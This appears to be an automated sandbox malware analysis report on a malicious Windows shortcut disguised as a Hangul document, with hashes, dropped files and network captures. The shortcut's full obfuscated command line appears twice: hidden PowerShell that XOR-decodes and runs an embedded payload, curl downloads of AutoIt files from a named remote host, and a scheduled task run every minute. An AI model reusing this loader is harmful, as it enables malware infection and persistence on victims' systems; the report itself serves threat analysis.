SHA1:	C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F
SHA-256:	D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
SHA-512:	1B04B40D36B6CDCB805C720341A21885594B9C7BAEAD0A6CC56E7F6CC1ACDFDB2522C12276B0973EAF2911A6D2A105DEFC27D48E574A6F87A11BFACCACF65E3F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: J-JeremieKarg-78462.js, Detection: malicious, Browse Filename: J-JeremieKarg-78462.js, Detection: malicious, Browse Filename: 5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs, Detection: malicious, Browse Filename: 6a7c258b33be34d613ad96e19665ce25bee7eefcf55204640682d6cc.vbs, Detection: malicious, Browse Filename: Efz.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.{MPq(MPq(MPq(+?.(FPq(.%t)kPq(.%u)BPq(.%r)GPq(D(.(.Pq(>2p)DPq(MPp(.Pq(.%y).Pq(.%.(LPq(.%s)LPq(RichMPq(........PE..d...J.~b.........."..........\.................@.............................`......[.....`.................................................H...4....@..@........(...........P..........T..............................8............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata...(.......*..................@..@_RDATA.......0......................@..@.rsrc...@....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsi0lfi.m4s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izk42yes.vps.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltnleziw.dj4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\Desktop\knfV5IVjEV

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Hangul (Korean) Word Processor File 5.x
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	6.8136714705106085
Encrypted:	false
SSDEEP:	384:n69Cjzy09JsOlg9IQSMnOpIQ5Rtn1JfzwtIhJ4mcRwGmYdHdevG:2Cjz3JFlg9NOpnRtnDfyIhiR6
MD5:	F092754547BBEAD9D23EFF09F6193A01
SHA1:	13779CECB25031B721FAC453EFD8762F2F54DAF7
SHA-256:	A5B2971F5651589FE2F214C66DF32FF5350892975A97239EBF2FB81E08B58D77
SHA-512:	3F8A382DB440B0729760595CC1974EE71BF8126383AF9CE92F5CA7E9D85E3788CF20B8C7860FEC2B8FE29F5344263DCFDB614560A939A0B94355DE3C1C8D0E2B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\GSlLzFnTov\GSlLzFnTov.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	478
Entropy (8bit):	2.729127576381513
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeg/8Uni1qSgOgcdivIddivIddivIdYn:Vz6ykymUexb1U9cddddddYn
MD5:	511CC06AC43E809AF9D1B85DA54FEA7B
SHA1:	BB215B0FED81B2EA14E77CEF1A49A7D4E403F615
SHA-256:	BC073B4151937AD142E6FBA4515388914A9FE5485D2057F3C72BE9DCA79152AF
SHA-512:	6B805AB7544E8EDE14FEDDD02E6BF527A6130E916FDCFC702CBFADB25C53AB475CD78FE231DAA25AAB5DA0C6E75B612E4DF31654673FBF4AE772D02A0E963681
Malicious:	false
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0..

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=0, Archive, ctime=Mon Dec 25 10:39:35 2023, mtime=Mon Apr 8 13:10:10 2024, atime=Mon Dec 25 10:39:35 2023, length=245248, window=hidenormalshowminimized
Entropy (8bit):	7.827246167977947
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	knfV5IVjEV.lnk
File size:	140'094 bytes
MD5:	9d6c79c0b395cceb83662aa3f7ed0123
SHA1:	65f5f7d127c478522e9669200de20000edcb6cfb
SHA256:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
SHA512:	8b297035ec18aaaba7165d5bc0955ab814f17a49ca27f3723ba5dfbae5115f4d25e786dba5533ecc2ed9a7509a12d5613d2bee34d00e499a6c54f116dd6136a2
SSDEEP:	3072:cxOao9p2xillZplcllOBllrlllllllilYllllllllIZyto3TnuYog8NPfNxvyK0l:4Zgo3Tu/gaFxaixVfIn2c
TLSH:	D7D3F1D25AFE9300E5D54732A8A409B2C86BBC231ABA6E4CF18E17355F8D701C8A3775
File Content Preview:	L..................F.... ....:..'7...J.w.....:..'7..........................5....P.O. .:i.....+00.../C:\...................V.1......X.J..Windows.@........T,.X.r..........................z...W.i.n.d.o.w.s.....Z.1......X.L..System32..B........T,.X.o......

File Icon


Icon Hash:	74f0e4e4e4e1e1ed

Static Windows Shortcut Info

General
Relative Path:
Command Line Argument:	/c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Icon location:	.hwp

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 03:02:20.443732023 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:20.443783998 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:20.443840981 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:20.457456112 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:20.457482100 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:20.849915028 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:20.849987030 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:20.853857994 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:20.853868008 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:20.854338884 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:20.860976934 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:20.908123016 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.067953110 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.068169117 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.068236113 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.085608959 CEST	49703	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.085642099 CEST	443	49703	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.278222084 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.278259993 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.278321981 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.287002087 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.287022114 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.665276051 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.665358067 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.666834116 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.666841030 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.667665005 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:22.670188904 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:22.716114998 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:24.044980049 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:24.045047998 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:24.045115948 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:24.153750896 CEST	49706	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:24.153779984 CEST	443	49706	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:26.751122952 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:26.751171112 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:26.751254082 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:26.759114981 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:26.759130955 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:27.130110979 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:27.130260944 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:27.133626938 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:27.133645058 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:27.134035110 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:27.146239996 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:27.192118883 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:28.717185974 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:28.717489958 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:28.717546940 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:28.733779907 CEST	49709	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:28.733819008 CEST	443	49709	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:29.107211113 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:29.107260942 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:29.107352972 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:29.114727974 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:29.114746094 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:29.484441996 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:29.484556913 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:29.485918045 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:29.485928059 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:29.486629963 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:29.489845991 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:29.536113977 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:30.858454943 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:30.858817101 CEST	443	49713	162.241.216.65	192.168.2.10
Apr 24, 2024 03:02:30.859482050 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:30.883124113 CEST	49713	443	192.168.2.10	162.241.216.65
Apr 24, 2024 03:02:30.883141994 CEST	443	49713	162.241.216.65	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 03:02:20.233855009 CEST	57403	53	192.168.2.10	1.1.1.1
Apr 24, 2024 03:02:20.438576937 CEST	53	57403	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 03:02:20.233855009 CEST	192.168.2.10	1.1.1.1	0xd5c8	Standard query (0)	jethropc.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 03:02:20.438576937 CEST	1.1.1.1	192.168.2.10	0xd5c8	No error (0)	jethropc.com		162.241.216.65	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jethropc.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49703	162.241.216.65	443	7848	C:\GSlLzFnTov\GSlLzFnTov.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 01:02:20 UTC	120	OUT	GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1 Host: jethropc.com User-Agent: curl/7.83.1 Accept: /
2024-04-24 01:02:22 UTC	273	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 01:02:21 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 0 X-nginx-cache: WordPress Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49706	162.241.216.65	443	7884	C:\GSlLzFnTov\GSlLzFnTov.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 01:02:22 UTC	120	OUT	GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1 Host: jethropc.com User-Agent: curl/7.83.1 Accept: /
2024-04-24 01:02:24 UTC	273	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 01:02:22 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 0 X-nginx-cache: WordPress Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49709	162.241.216.65	443	7980	C:\GSlLzFnTov\GSlLzFnTov.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 01:02:27 UTC	120	OUT	GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1 Host: jethropc.com User-Agent: curl/7.83.1 Accept: /
2024-04-24 01:02:28 UTC	273	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 01:02:27 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 0 X-nginx-cache: WordPress Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49713	162.241.216.65	443	8092	C:\GSlLzFnTov\GSlLzFnTov.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 01:02:29 UTC	120	OUT	GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1 Host: jethropc.com User-Agent: curl/7.83.1 Accept: /
2024-04-24 01:02:30 UTC	273	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 01:02:29 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 0 X-nginx-cache: WordPress Content-Length: 0 Content-Type: text/html; charset=UTF-8

Target ID:	1
Start time:	03:02:08
Start date:	24/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Imagebase:	0x7ff660490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:02:08
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:02:08
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
